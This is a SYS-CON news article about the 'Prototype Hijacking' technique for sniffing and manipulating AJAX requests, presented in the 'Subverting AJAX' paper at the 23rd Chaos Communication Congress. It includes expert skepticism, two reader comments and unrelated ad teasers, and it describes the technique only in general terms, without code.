Digital Edition

SYS-CON.TV
Might "Prototype Hijacking" Subvert AJAX?
New ploy exploits sites with cross-site scripting holes

(SYS-CON Media) – Does JavaScript, which was never intended to do anything resembling what it does within the approach now called AJAX, have a fundamental design flaw? That's the question being asked by Stefano Di Paola and Giorgio Fedon. By using a new technique called "Prototype Hijacking," Di Paola and Fedon claim, it has been shown how it is possible to sniff and manipulate in real time asynchronous requests originating from any browser in a way which is transparent and independent from the framework used.

Their paper, "Subverting AJAX," was written for the 23rd Chaos Communication Conference, which took place at the Berliner Congress Center from 27-30 December, 2006. The conference has a weblog here: 23C3 Weblog.

The authors - Stefano Di Paola describes himself as a Senior Security Engineer while Fedon is currently employed as senior security consultant and penetration tester at Emaze Networks - conclude with the following thought, in somewhat broken English:

"As it seems, Web 2.0 applications will be more and more tightly tied to browser security, that is increasing in complexity and has to take care of a plethora of features that can be turned into weapons if controlled by a malicious attacker."
They describe what they call "a very interesting cache-injection technique" that permits attacks against the way asynchronous requests are made to be leveraged in a way that allows an attacker to poison almost permanently the web sites visited and stored into browser cache.

They also describe a new type of attack that bypasses even "restrictions imposed by web sites not vulnerable to XSS."

Experts however aren't  convinced. One who has checked the Opera, Safari and (Gecko-based) Camino browsers, writing on Slashdot, reports that they all "have completly separate sets of prototypes for each frame, so you can't circumvent XSS protection using prototypes."

As the Slashdot poster comments: "So it seems there's nothing to get excited about - you must have exploitable XSS vulnerability to begin with, so it's not the end of the internet just yet."

About Security News Desk
SYS-CON's Security News desk trawls the world of security for news of software, hardware, products, and services that seems likely to be of interest to infosec professionals and summarizes them for easy assimilation by busy IT managers and staff.

In order to post a comment you need to be registered and logged in.

Register | Sign-in

Reader Feedback: Page 1 of 1

The fundamental flaw is not in Javscript. It's in current implementations of Javascript.

The problem isn't the use of Ajax (or XmlHttpRequest) itself is harmful, the problem is XSS-holes are harmful!




ADS BY GOOGLE
Subscribe to the World's Most Powerful Newsletters

ADS BY GOOGLE

The need for greater agility and scalability necessitated the digital transformation in the form of ...
ChatOps is an emerging topic that has led to the wide availability of integrations between group cha...
In his keynote at 18th Cloud Expo, Andrew Keys, Co-Founder of ConsenSys Enterprise, provided an over...
The cloud era has reached the stage where it is no longer a question of whether a company should mig...
While some developers care passionately about how data centers and clouds are architected, for most,...
As DevOps methodologies expand their reach across the enterprise, organizations face the daunting ch...
"Since we launched LinuxONE we learned a lot from our customers. More than anything what they respon...
In his session at 21st Cloud Expo, Raju Shreewastava, founder of Big Data Trunk, provided a fun and ...
You know you need the cloud, but you’re hesitant to simply dump everything at Amazon since you know ...
Is advanced scheduling in Kubernetes achievable?Yes, however, how do you properly accommodate every ...
DevOps is under attack because developers don’t want to mess with infrastructure. They will happily ...
Coca-Cola’s Google powered digital signage system lays the groundwork for a more valuable connection...
"As we've gone out into the public cloud we've seen that over time we may have lost a few things - w...
In his session at 21st Cloud Expo, Michael Burley, a Senior Business Development Executive in IT Ser...
Sanjeev Sharma Joins June 5-7, 2018 @DevOpsSummit at @Cloud Expo New York Faculty. Sanjeev Sharma is...
We are given a desktop platform with Java 8 or Java 9 installed and seek to find a way to deploy hig...
"I focus on what we are calling CAST Highlight, which is our SaaS application portfolio analysis too...
"Cloud4U builds software services that help people build DevOps platforms for cloud-based software a...
The question before companies today is not whether to become intelligent, it’s a question of how and...
Kubernetes is an open source system for automating deployment, scaling, and management of containeri...